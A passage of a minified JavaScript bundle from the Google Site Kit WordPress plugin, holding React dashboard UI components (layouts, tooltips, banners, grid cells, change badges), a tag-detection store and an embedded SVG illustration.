tooltip","google-site-kit"),c[t],g[t](o),p,(0,l.Eo)(Math.abs(u),"%"));A.push([e[0],`<div class="${s()("googlesitekit-visualization-tooltip",{"googlesitekit-visualization-tooltip--up":u>0,"googlesitekit-visualization-tooltip--down":u<0})}">\n\t\t\t\t<p>${I}</p>\n\t\t\t\t<p>${y}</p>\n\t\t\t</div>`,h?(0,l.vH)(o):o,h?(0,l.vH)(r):r])}),A}},74655:(e,t,i)=>{"use strict";i.d(t,{A:()=>ChangeBadge});var a=i(62688),s=i.n(a),o=i(4452),n=i.n(o),r=i(6109),l=i(62540);function ChangeBadge(e){const{previousValue:t,currentValue:i,isAbsolute:a}=e,s=a?i-t:(0,r.Zf)(t,i),o=s<0,c=0===s;return null===s?null:(0,l.jsx)("div",{className:n()("googlesitekit-change-badge",{"googlesitekit-change-badge--negative":o,"googlesitekit-change-badge--zero":c}),children:(0,r.Eo)(s,{style:"percent",signDisplay:"exceptZero",maximumFractionDigits:1})})}ChangeBadge.propTypes={isAbsolute:s().bool,previousValue:s().number.isRequired,currentValue:s().number.isRequired}},75498:(e,t,i)=>{"use strict";i.d(t,{d:()=>d});var a=i(32091),s=i.n(a),o=i(50539),n=i(29785),r=i(56768);const l="FETCH_GET_EXISTING_TAG",c="RECEIVE_GET_EXISTING_TAG";function d({storeName:e,isValidTag:t,tagMatchers:i}={}){s()("string"==typeof e&&e,"storeName is required."),s()("function"==typeof t,"isValidTag must be a function."),s()(Array.isArray(i),"tagMatchers must be an Array.");const a={existingTag:void 0},d={fetchGetExistingTag:()=>({payload:{},type:l}),receiveGetExistingTag:e=>(s()(null===e||"string"==typeof e,"existingTag must be a tag string or null."),{payload:{existingTag:t(e)?e:null},type:c})},g={[l]:(0,o.createRegistryControl)(e=>async()=>{const t=e.select(n.O4).getHomeURL(),a=e.select(n.O4).getAMPMode(),s=await(0,r.g)({homeURL:t,ampMode:a}),{getHTMLForURL:o}=e.resolveSelect(n.O4);for(const e of s){const t=await o(e),a=(0,r.N)(t,i);if(a)return a}return null})},u=(0,o.createReducer)((e,{type:t,payload:i})=>{switch(t){case c:{const{existingTag:t}=i;e.existingTag=t;break}}}),m={*getExistingTag(){const t=yield o.commonActions.getRegistry();if(void 0===t.select(e).getExistingTag()){const i=yield d.fetchGetExistingTag();t.dispatch(e).receiveGetExistingTag(i)}}},p={getExistingTag:e=>e.existingTag,hasExistingTag:(0,o.createRegistrySelector)(t=>()=>{const i=t(e).getExistingTag();if(void 0!==i)return!!i})};return{...{initialState:a,actions:d,controls:g,reducer:u,resolvers:m,selectors:p},STORE_NAME:e}}},75662:(e,t,i)=>{"use strict";i.d(t,{A:()=>I});var a=i(62688),s=i.n(a),o=i(4452),n=i.n(o),r=i(63696),l=i(10740),c=i(38432),d=i(33052),g=i(62540);class LayoutHeader extends r.Component{render(){const{title:e,badge:t,ctaLabel:i,ctaLink:a}=this.props,s=a?{alignMiddle:!0,smSize:4,lgSize:6}:{alignMiddle:!0,smSize:4,mdSize:8,lgSize:12};return(0,g.jsx)("header",{className:"googlesitekit-layout__header",children:(0,g.jsx)(l.xA,{children:(0,g.jsxs)(l.fI,{children:[e&&(0,g.jsx)(l.fh,{...s,children:(0,g.jsxs)(d.A,{as:"h3",size:"small",type:"title",className:"googlesitekit-subheading-1 googlesitekit-layout__header-title",children:[e,t]})}),a&&(0,g.jsx)(l.fh,{smSize:4,lgSize:6,alignMiddle:!0,mdAlignRight:!0,children:(0,g.jsx)(c.A,{href:a,external:!0,children:i})})]})})})}}LayoutHeader.propTypes={title:s().string,badge:s().node,ctaLabel:s().string,ctaLink:s().string},LayoutHeader.defaultProps={title:"",badge:null,ctaLabel:"",ctaLink:""};const u=LayoutHeader;var m=i(44148);class LayoutFooter extends r.Component{render(){const{ctaLabel:e,ctaLink:t,footerContent:i}=this.props;return(0,g.jsx)("footer",{className:"googlesitekit-layout__footer",children:(0,g.jsx)(l.xA,{children:(0,g.jsx)(l.fI,{children:(0,g.jsxs)(l.fh,{size:12,children:[t&&e&&(0,g.jsx)(m.A,{className:"googlesitekit-data-block__source",name:e,href:t,external:!0}),i]})})})})}}LayoutFooter.propTypes={ctaLabel:s().string,ctaLink:s().string};const p=LayoutFooter;class Layout extends r.Component{render(){const{header:e,footer:t,children:i,title:a,badge:s,headerCTALabel:o,headerCTALink:r,footerCTALabel:l,footerCTALink:c,footerContent:d,className:m,fill:I,relative:h,rounded:y=!1,transparent:A=!1,...M}=this.props;return(0,g.jsxs)("div",{className:n()("googlesitekit-layout",m,{"googlesitekit-layout--fill":I,"googlesitekit-layout--relative":h,"googlesitekit-layout--rounded":y,"googlesitekit-layout--transparent":A}),...M,children:[e&&(0,g.jsx)(u,{title:a,badge:s,ctaLabel:o,ctaLink:r}),i,t&&(0,g.jsx)(p,{ctaLabel:l,ctaLink:c,footerContent:d})]})}}Layout.propTypes={header:s().bool,footer:s().bool,children:s().node.isRequired,title:s().string,badge:s().node,headerCTALabel:s().string,headerCTALink:s().string,footerCTALabel:s().string,footerCTALink:s().string,footerContent:s().node,className:s().string,fill:s().bool,relative:s().bool,rounded:s().bool,transparent:s().bool},Layout.defaultProps={header:!1,footer:!1,title:"",badge:null,headerCTALabel:"",headerCTALink:"",footerCTALabel:"",footerCTALink:"",footerContent:null,className:"",fill:!1,relative:!1};const I=Layout},76729:(e,t,i)=>{"use strict";i.d(t,{Q:()=>a});const a="emailReportingUserSettingsSelectionPanelOpened"},76984:(e,t,i)=>{"use strict";i.d(t,{Q:()=>a});const a={NEW:"new",SUCCESS:"success",WARNING:"warning",INFO:"info",INFO_ALT:"info-alt",ERROR:"error"}},78014:(e,t,i)=>{"use strict";i.d(t,{A:()=>StoreErrorNotices});var a=i(62688),s=i.n(a),o=i(50539),n=i(73198),r=i(88273),l=i(13137),c=i(31012),d=i(62540);function StoreErrorNotices({hasButton:e=!1,moduleSlug:t,storeName:i}){const a=(0,o.useSelect)(e=>e(i).getErrors()),s=(0,o.useSelect)(e=>e(r.i).getModule(t)),g=[];return a.filter(e=>!(!e?.message||g.includes(e.message))&&(g.push(e.message),!0)).map((t,a)=>{let{message:o}=t;return(0,l.SG)(t)&&(o=(0,c.c)(o,s)),(0,d.jsx)(n.A,{error:t,hasButton:e,storeName:i,message:o},a)})}StoreErrorNotices.propTypes={hasButton:s().bool,storeName:s().string.isRequired,moduleSlug:s().string}},79961:(e,t,i)=>{"use strict";i.d(t,{A:()=>o});var a=i(63696),s=i(84895);const o=(0,a.createContext)(s.t)},80452:(e,t,i)=>{"use strict";i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var a,s=i(63696);function o(){return o=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},o.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>s.createElement("svg",o({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 12 9"},e),a||(a=s.createElement("path",{stroke:"currentColor",strokeLinecap:"square",strokeWidth:1.6,d:"m2 5.309 1.474 2.14c.69 1.001 1.946 1.001 2.636 0L10 1.8"})))},82267:(e,t,i)=>{"use strict";i.d(t,{A:()=>InfoTooltip});var a,s=i(4452),o=i.n(s),n=i(62688),r=i.n(n),l=i(49383),c=i(63696);function d(){return d=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},d.apply(null,arguments)}const g=e=>c.createElement("svg",d({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 16 16"},e),a||(a=c.createElement("path",{fill:"currentColor",d:"M7.334 11.333h1.333v-4H7.334zM8.001 6a.658.658 0 0 0 .667-.667.6.6 0 0 0-.2-.467.6.6 0 0 0-.467-.2.66.66 0 0 0-.667.667q0 .284.183.483A.7.7 0 0 0 8.001 6m0 8.666a6.6 6.6 0 0 1-2.6-.516 6.9 6.9 0 0 1-2.117-1.434A6.9 6.9 0 0 1 1.851 10.6 6.6 6.6 0 0 1 1.334 8q0-1.385.517-2.6a6.9 6.9 0 0 1 1.433-2.117q.9-.9 2.117-1.417A6.4 6.4 0 0 1 8 1.333q1.383 0 2.6.533a6.6 6.6 0 0 1 2.116 1.417q.9.9 1.417 2.117.533 1.215.533 2.6 0 1.383-.533 2.6a6.6 6.6 0 0 1-1.417 2.116 6.9 6.9 0 0 1-2.116 1.434 6.6 6.6 0 0 1-2.6.516m0-1.333q2.233 0 3.783-1.55T13.334 8t-1.55-3.784-3.783-1.55-3.784 1.55T2.667 8t1.55 3.783 3.784 1.55"})));var u=i(62540);function InfoTooltip({onOpen:e,title:t,tooltipClassName:i}){return t?(0,u.jsx)(l.Tooltip,{className:"googlesitekit-info-tooltip",tooltipClassName:o()("googlesitekit-info-tooltip__content",i),title:t,placement:"top",enterTouchDelay:0,leaveTouchDelay:5e3,onOpen:e,interactive:!0,children:(0,u.jsx)("span",{children:(0,u.jsx)(g,{width:"16",height:"16"})})}):null}InfoTooltip.propTypes={onOpen:r().func,title:r().oneOfType([r().string,r().element]),tooltipClassName:r().string}},82871:e=>{"use strict";e.exports=googlesitekit.i18n},83202:(e,t,i)=>{"use strict";i.d(t,{A:()=>TourTooltip});var a=i(28056),s=i.n(a),o=i(4452),n=i.n(o),r=i(62688),l=i.n(r),c=i(82871),d=i(49383);var g=i(72545),u=i(33052),m=i(62540);function TourTooltip({backProps:e,closeProps:t,index:i,primaryProps:o,size:r,step:l,tooltipProps:p}){const I=r>1?function(e){return new Array(null!=e?e:0).fill().map((e,t)=>t)}(r):[];function h(e){return n()("googlesitekit-tooltip-indicator",{active:e===i})}return(0,m.jsx)("div",{className:n()("googlesitekit-tour-tooltip",l.className),...p,children:(0,m.jsxs)(s(),{className:"googlesitekit-tooltip-card",children:[(0,m.jsxs)("div",{className:"googlesitekit-tooltip-body",children:[(0,m.jsx)(u.A,{as:"h2",className:"googlesitekit-tooltip-title",size:"medium",type:"title",children:l.title}),(0,m.jsx)("div",{className:"googlesitekit-tooltip-content",children:l.content})]}),(0,m.jsxs)(a.CardActions,{className:"googlesitekit-tooltip-actions",children:[(0,m.jsx)("ul",{className:"googlesitekit-tooltip-indicators",children:I.map(e=>(0,m.jsx)("li",{className:h(e)},`indicator-${e}`))}),(0,m.jsxs)("div",{className:"googlesitekit-tooltip-buttons",children:[0!==i&&(0,m.jsx)(d.Button,{className:"googlesitekit-tooltip-button",text:!0,...e,children:e.title}),l.cta,o.title&&(0,m.jsx)(d.Button,{className:"googlesitekit-tooltip-button",text:!0,...o,children:o.title})]})]}),(0,m.jsx)(d.Button,{className:"googlesitekit-tooltip-close",icon:(0,m.jsx)(g.A,{width:"14",height:"14"}),onClick:t.onClick,"aria-label":(0,c.__)("Close","google-site-kit"),text:!0,hideTooltipTitle:!0})]})})}TourTooltip.propTypes={backProps:l().object.isRequired,closeProps:l().object.isRequired,index:l().number.isRequired,isLastStep:l().bool.isRequired,primaryProps:l().object.isRequired,size:l().number.isRequired,step:l().shape({content:l().node,title:l().node,cta:l().oneOfType([l().element,l().bool]),className:l().string}).isRequired,tooltipProps:l().object.isRequired}},83366:(e,t,i)=>{"use strict";i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var a,s=i(63696);function o(){return o=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},o.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>s.createElement("svg",o({xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},e),a||(a=s.createElement("path",{d:"M5 21a2 2 0 0 1-1.425-.575A2 2 0 0 1 3 19V5q0-.825.575-1.4Q4.175 3 5 3h7v2H5v14h14v-7h2v7q0 .825-.6 1.425Q19.825 21 19 21zm4.7-5.3-1.4-1.4L17.6 5H14V3h7v7h-2V6.4z"})))},83880:(e,t,i)=>{"use strict";i.d(t,{A:()=>c});var a=i(62688),s=i.n(a),o=i(97513),n=i(33052),r=i(8513),l=i(62540);function c({type:e=r.SZ,size:t,children:i,...a}){const s=(0,o.dv)();return(0,l.jsx)(n.A,{as:"p",type:e,size:t||(s===o.mp?r.Kk:r.Yw),...a,children:i})}c.propTypes={type:s().oneOf(r.tT),size:s().oneOf(r.oJ)}},83891:(e,t,i)=>{"use strict";i.d(t,{A:()=>h});var a=i(4452),s=i.n(a),o=i(62688),n=i.n(o),r=i(63696),l=i(97513),c=i(62540);function TitleIcon({className:e,children:t}){return(0,c.jsx)("div",{className:s()("googlesitekit-banner__title-icon",e),children:t})}function Title({className:e,children:t}){return(0,c.jsx)("p",{className:s()("googlesitekit-banner__title",e),children:t})}TitleIcon.propTypes={className:n().string,children:n().node},Title.propTypes={className:n().string,children:n().node};var d=i(6109),g=i(41671);function Description({className:e,description:t,learnMoreLink:i,additionalDescription:a,children:o}){return(0,c.jsxs)("div",{className:s()("googlesitekit-banner__description",e),children:[(0,r.isValidElement)(t)?t:"string"==typeof t?(0,c.jsx)("span",{dangerouslySetInnerHTML:(0,d.p9)(t,{ALLOWED_TAGS:["strong","em","br","a"],ALLOWED_ATTR:["href"]})}):t," ",i?.href&&(0,c.jsx)(g.A,{...i}),a&&(0,c.jsx)("div",{className:"googlesitekit-banner__additional-description",children:a}),o]})}function HelpText({className:e,children:t}){return(0,c.jsx)("p",{className:s()("googlesitekit-banner__help-text",e),children:t})}Description.propTypes={className:n().string,description:n().oneOfType([n().string,n().node]),learnMoreLink:n().shape(g.A.propTypes),additionalDescription:n().oneOfType([n().string,n().node]),children:n().node},HelpText.propTypes={className:n().string,children:n().node};var u=i(71189),m=i(61983);function Footer({className:e,children:t}){return(0,c.jsx)("div",{className:s()("googlesitekit-banner__footer",e),children:t})}Footer.propTypes={className:n().string,children:n().node};var p=i(25797);const I=(0,r.forwardRef)(({className:e,titleIcon:t,title:i,description:a,additionalDescription:o,errorText:n,helpText:r,learnMoreLink:d,dismissButton:g,ctaButton:I,svg:h,footer:y},A)=>{const M=(0,l.dv)(),N=M===l.mp||M===l.Lg;let f=null;N&&h?.mobile?f=h.mobile:!N&&h?.desktop&&(f=h.desktop);const T=h?.verticalPosition?h.verticalPosition:"center";return(0,c.jsxs)("div",{ref:A,className:s()("googlesitekit-banner",e),children:[(0,c.jsxs)("div",{className:"googlesitekit-banner__content",children:[t&&(0,c.jsx)(TitleIcon,{children:t}),(0,c.jsx)(Title,{children:i}),(0,c.jsx)(Description,{description:a,learnMoreLink:d,additionalDescription:o}),r&&(0,c.jsx)(HelpText,{children:r}),n&&(0,c.jsx)(p.A,{type:"error",description:n}),(0,c.jsxs)("div",{className:"googlesitekit-notice__action",children:[I&&(0,c.jsx)(u.A,{...I}),g?.onClick&&(0,c.jsx)(m.A,{...g})]})]}),f&&(0,c.jsx)("div",{className:s()("googlesitekit-banner__svg-wrapper",{[`googlesitekit-banner__svg-wrapper--${T}`]:T}),style:{backgroundImage:`url(${f})`}}),y&&(0,c.jsx)(Footer,{children:y})]})});I.propTypes={titleIcon:n().node,title:n().string,description:n().oneOfType([n().string,n().node]),additionalDescription:n().oneOfType([n().string,n().node]),errorText:n().string,helpText:n().string,learnMoreLink:n().shape(g.A.propTypes),dismissButton:n().shape(m.A.propTypes),ctaButton:n().shape(u.A.propTypes),svg:n().shape({desktop:n().elementType,mobile:n().elementType,verticalPosition:n().oneOf(["top","center","bottom"])}),footer:n().node};const h=I},84730:(e,t,i)=>{"use strict";i.d(t,{FQ:()=>o,He:()=>r,bI:()=>n,rq:()=>s,ui:()=>a});const a="warning-notification-gtg",s="gtg-setup-cta",o={ERROR_HIGH:30,ERROR_LOW:60,WARNING:100,INFO:150,SETUP_CTA_HIGH:150,SETUP_CTA_LOW:200},n={HEADER:"notification-area-header",DASHBOARD_TOP:"notification-area-dashboard-top",OVERLAYS:"notification-area-overlays"},r={DEFAULT:"default",SETUP_CTAS:"setup-ctas"}},84895:(e,t,i)=>{"use strict";i.d(t,{G:()=>s,t:()=>a});const a=new Set(i.g?._googlesitekitBaseData?.enabledFeatures||[]);function s(e,t=a){return t instanceof Set&&t.has(e)}},84984:(e,t,i)=>{"use strict";i.d(t,{fh:()=>Cell,xA:()=>u,fI:()=>d});var a=i(62688),s=i.n(a),o=i(4452),n=i.n(o),r=i(62540);function Cell(e){const{className:t,alignTop:i,alignMiddle:a,alignBottom:s,alignRight:o,alignLeft:l,smAlignRight:c,mdAlignRight:d,lgAlignRight:g,smSize:u,smStart:m,smOrder:p,mdSize:I,mdStart:h,mdOrder:y,lgSize:A,lgStart:M,lgOrder:N,size:f,children:T,...S}=e;return(0,r.jsx)("div",{...S,className:n()(t,"mdc-layout-grid__cell",{"mdc-layout-grid__cell--align-top":i,"mdc-layout-grid__cell--align-middle":a,"mdc-layout-grid__cell--align-bottom":s,"mdc-layout-grid__cell--align-right":o,"mdc-layout-grid__cell--align-left":l,"mdc-layout-grid__cell--align-right-phone":c,"mdc-layout-grid__cell--align-right-tablet":d,"mdc-layout-grid__cell--align-right-desktop":g,[`mdc-layout-grid__cell--span-${f}`]:12>=f&&f>0,[`mdc-layout-grid__cell--span-${A}-desktop`]:12>=A&&A>0,[`mdc-layout-grid__cell--start-${M}-desktop`]:12>=M&&M>0,[`mdc-layout-grid__cell--order-${N}-desktop`]:12>=N&&N>0,[`mdc-layout-grid__cell--span-${I}-tablet`]:8>=I&&I>0,[`mdc-layout-grid__cell--start-${h}-tablet`]:8>=h&&h>0,[`mdc-layout-grid__cell--order-${y}-tablet`]:8>=y&&y>0,[`mdc-layout-grid__cell--span-${u}-phone`]:4>=u&&u>0,[`mdc-layout-grid__cell--start-${m}-phone`]:4>=m&&m>0,[`mdc-layout-grid__cell--order-${p}-phone`]:4>=p&&p>0}),children:T})}Cell.propTypes={smSize:s().number,smStart:s().number,smOrder:s().number,mdSize:s().number,mdStart:s().number,mdOrder:s().number,lgSize:s().number,lgStart:s().number,lgOrder:s().number,size:s().number,alignTop:s().bool,alignMiddle:s().bool,alignBottom:s().bool,alignRight:s().bool,alignLeft:s().bool,smAlignRight:s().bool,mdAlignRight:s().bool,lgAlignRight:s().bool,className:s().string,children:s().node},Cell.defaultProps={className:"",size:0,smSize:0,smStart:0,smOrder:0,mdSize:0,mdStart:0,mdOrder:0,lgSize:0,lgStart:0,lgOrder:0};var l=i(63696);const c=(0,l.forwardRef)(({className:e,children:t,...i},a)=>(0,r.jsx)("div",{ref:a,className:n()("mdc-layout-grid__inner",e),...i,children:t}));c.displayName="Row",c.propTypes={className:s().string,children:s().node},c.defaultProps={className:""};const d=c,g=(0,l.forwardRef)(({alignLeft:e,fill:t,className:i,children:a,collapsed:s,...o},l)=>(0,r.jsx)("div",{className:n()("mdc-layout-grid",i,{"mdc-layout-grid--align-left":e,"mdc-layout-grid--collapsed":s,"mdc-layout-grid--fill":t}),...o,ref:l,children:a}));g.displayName="Grid",g.propTypes={alignLeft:s().bool,fill:s().bool,className:s().string,collapsed:s().bool,children:s().node},g.defaultProps={className:""};const u=g},85097:(e,t,i)=>{"use strict";i.d(t,{W:()=>l});var a=i(79257),s=i(35470),o=i(63696),n=i(52735),r=i(7972);function l({sticky:e=!1}={}){const t=(0,o.useContext)(n.A),[i,l]=(0,o.useState)(!1),c=(0,s.A)(e=>e(r.n).getInViewResetCount()),d=(0,s.A)(e=>e(r.n).getValue("forceInView"));return(0,o.useEffect)(()=>{t.value&&!i&&l(!0)},[i,t,l]),(0,o.useEffect)(()=>{d&&l(!0)},[d]),(0,a.A)(()=>{l(!1)},[c]),!(!e||!i)||!!t.value}},85149:(e,t,i)=>{"use strict";i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var a,s,o=i(63696);function n(){return n=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},n.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>o.createElement("svg",n({xmlns:"http://www.w3.org/2000/svg",fill:"currentColor","aria-labelledby":"warning-title warning-desc",viewBox:"0 0 24 24"},e),a||(a=o.createElement("path",{fill:"none",d:"M0 0h24v24H0z"})),s||(s=o.createElement("path",{d:"M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2m1 15h-2v-2h2zm0-4h-2V7h2z"})))},85172:(e,t,i)=>{"use strict";i.d(t,{A:()=>PageHeader});var a=i(4452),s=i.n(a),o=i(62688),n=i.n(o),r=i(10740),l=i(24560),c=i(18418),d=i(50304),g=i(33052),u=i(62540);function PageHeader(e){const{title:t,icon:i,className:a,status:o,statusText:n,fullWidth:m,children:p}=e,I=m?{size:12}:{smSize:4,mdSize:4,lgSize:6},h=""!==o||Boolean(p);return(0,u.jsx)("header",{className:"googlesitekit-page-header",children:(0,u.jsxs)(r.fI,{children:[t&&(0,u.jsxs)(r.fh,{...I,children:[i,(0,u.jsx)(g.A,{as:"h1",className:s()("googlesitekit-page-header__title",a),size:"medium",type:"title",children:t})]}),h&&(0,u.jsx)(r.fh,{smSize:4,mdSize:4,lgSize:6,alignBottom:!0,mdAlignRight:!0,children:(0,u.jsxs)("div",{className:"googlesitekit-page-header__details",children:[o&&(0,u.jsxs)("span",{className:s()("googlesitekit-page-header__status",`googlesitekit-page-header__status--${o}`),children:[n,(0,u.jsx)(d.A,{children:"connected"===o?(0,u.jsx)(l.A,{width:10,height:8}):(0,u.jsx)(c.A,{width:2,height:12})})]}),p]})})]})})}PageHeader.propTypes={title:n().string,icon:n().node,className:n().string,status:n().string,statusText:n().string,fullWidth:n().bool},PageHeader.defaultProps={title:"",icon:null,className:"googlesitekit-heading-3",status:"",statusText:"",fullWidth:!1}},85284:(e,t,i)=>{"use strict";i.d(t,{A:()=>a});const a="data:image/svg+xml;base64,<svg width="435" height="146" viewBox="0 0 435 146" fill="none" xmlns="http://www.w3.org/2000/svg">
<g clip-path="url(#clip0_1505_4361)">
<path d="M424.497 198.308C403.64 241.905 347.907 242.374 316.959 235.733C276.584 227.07 249.785 195.38 214.535 193.373C179.286 191.365 159.634 209.704 121.649 214.286C83.6641 218.869 37.0776 214.703 12.9143 167.626C-11.249 120.549 5.41532 70.714 48.326 45.7381C91.2368 20.7622 117.271 45.8646 159.634 45.7381C201.998 45.6115 219.122 7.78172 258.534 4.71553C278.097 3.19357 297.811 7.21779 317.379 20.7622C336.734 34.1583 339.57 58.676 387.752 81.4878C435.935 104.3 445.354 154.712 424.497 198.308Z" fill="#B8E6CA"/>
<g filter="url(#filter0_d_1505_4361)">
<rect x="216.703" y="28.876" width="116.796" height="63.707" rx="7.78641" fill="white"/>
</g>
<rect x="228.029" y="40.2012" width="17.6964" height="5.66285" rx="2.83142" fill="#EBEEF0"/>
<rect x="228.029" y="52.2351" width="35.3928" height="14.1571" rx="7.07856" fill="#FFDED3"/>
<rect x="228.029" y="77.0095" width="94.1448" height="5.66285" rx="2.83142" fill="#EBEEF0"/>
<path d="M234.397 57.1902L239.064 61.8574M239.064 61.8574L239.116 58.1755M239.064 61.8574L235.382 61.9092" stroke="white" stroke-width="1.06178" stroke-linecap="round" stroke-linejoin="round"/>
<rect x="243.602" y="57.1902" width="14.1571" height="4.24713" rx="1.41571" fill="white"/>
<g filter="url(#filter1_d_1505_4361)">
<rect x="88" y="102.772" width="116.796" height="63.707" rx="7.78641" fill="white"/>
</g>
<rect x="99.1543" y="113.927" width="46.3334" height="6.00618" rx="2.83142" fill="#EBEEF0"/>
<rect x="99.3262" y="126.132" width="35.3928" height="14.1571" rx="7.07856" fill="#FFDED3"/>
<path d="M105.694 131.087L110.361 135.754M110.361 135.754L110.413 132.072M110.361 135.754L106.679 135.806" stroke="white" stroke-width="1.06178" stroke-linecap="round" stroke-linejoin="round"/>
<rect x="114.898" y="131.087" width="14.1571" height="4.24713" rx="1.41571" fill="white"/>
<g filter="url(#filter2_d_1505_4361)">
<rect x="88" y="28.876" width="116.796" height="63.707" rx="7.78641" fill="white"/>
</g>
<rect x="99.3252" y="40.2012" width="74.3248" height="5.66285" rx="2.83142" fill="#EBEEF0"/>
<rect x="99.3252" y="52.2351" width="35.3928" height="14.1571" rx="7.07856" fill="#B8E6CA"/>
<rect x="99.3252" y="77.0095" width="94.1448" height="5.66285" rx="2.83142" fill="#EBEEF0"/>
<path d="M105.696 61.9092L110.363 57.242M110.363 57.242L106.682 57.1902M110.363 57.242L110.415 60.9239" stroke="white" stroke-width="1.06178" stroke-linecap="round" stroke-linejoin="round"/>
<rect x="114.898" y="57.1902" width="14.1571" height="4.24713" rx="1.41571" fill="white"/>
<g filter="url(#filter3_d_1505_4361)">
<rect x="216.703" y="102.772" width="116.796" height="63.707" rx="7.78641" fill="white"/>
</g>
<rect x="228.028" y="114.098" width="45.3028" height="5.66285" rx="2.83142" fill="#EBEEF0"/>
<path d="M228.028 133.21C228.028 129.301 231.197 126.132 235.107 126.132H256.343C260.252 126.132 263.421 129.301 263.421 133.21C263.421 137.12 260.252 140.289 256.343 140.289H235.107C231.197 140.289 228.028 137.12 228.028 133.21Z" fill="#B8E6CA"/>
<path d="M234.399 135.806L239.067 131.139M239.067 131.139L235.385 131.087M239.067 131.139L239.118 134.82" stroke="white" stroke-width="1.06178" stroke-linecap="round" stroke-linejoin="round"/>
<rect x="243.602" y="131.087" width="14.1571" height="4.24713" rx="1.41571" fill="white"/>
</g>
<defs>
<filter id="filter0_d_1505_4361" x="205.377" y="20.3817" width="139.447" height="86.3584" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="2.83142"/>
<feGaussianBlur stdDeviation="5.66285"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1505_4361"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1505_4361" result="shape"/>
</filter>
<filter id="filter1_d_1505_4361" x="76.6743" y="94.2782" width="139.447" height="86.3584" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="2.83142"/>
<feGaussianBlur stdDeviation="5.66285"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1505_4361"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1505_4361" result="shape"/>
</filter>
<filter id="filter2_d_1505_4361" x="76.6743" y="20.3817" width="139.447" height="86.3584" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="2.83142"/>
<feGaussianBlur stdDeviation="5.66285"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1505_4361"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1505_4361" result="shape"/>
</filter>
<filter id="filter3_d_1505_4361" x="205.377" y="94.2782" width="139.447" height="86.3584" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="2.83142"/>
<feGaussianBlur stdDeviation="5.66285"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1505_4361"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1505_4361" result="shape"/>
</filter>
<clipPath id="clip0_1505_4361">
<rect width="435" height="146" fill="white"/>
</clipPath>
</defs>
</svg>
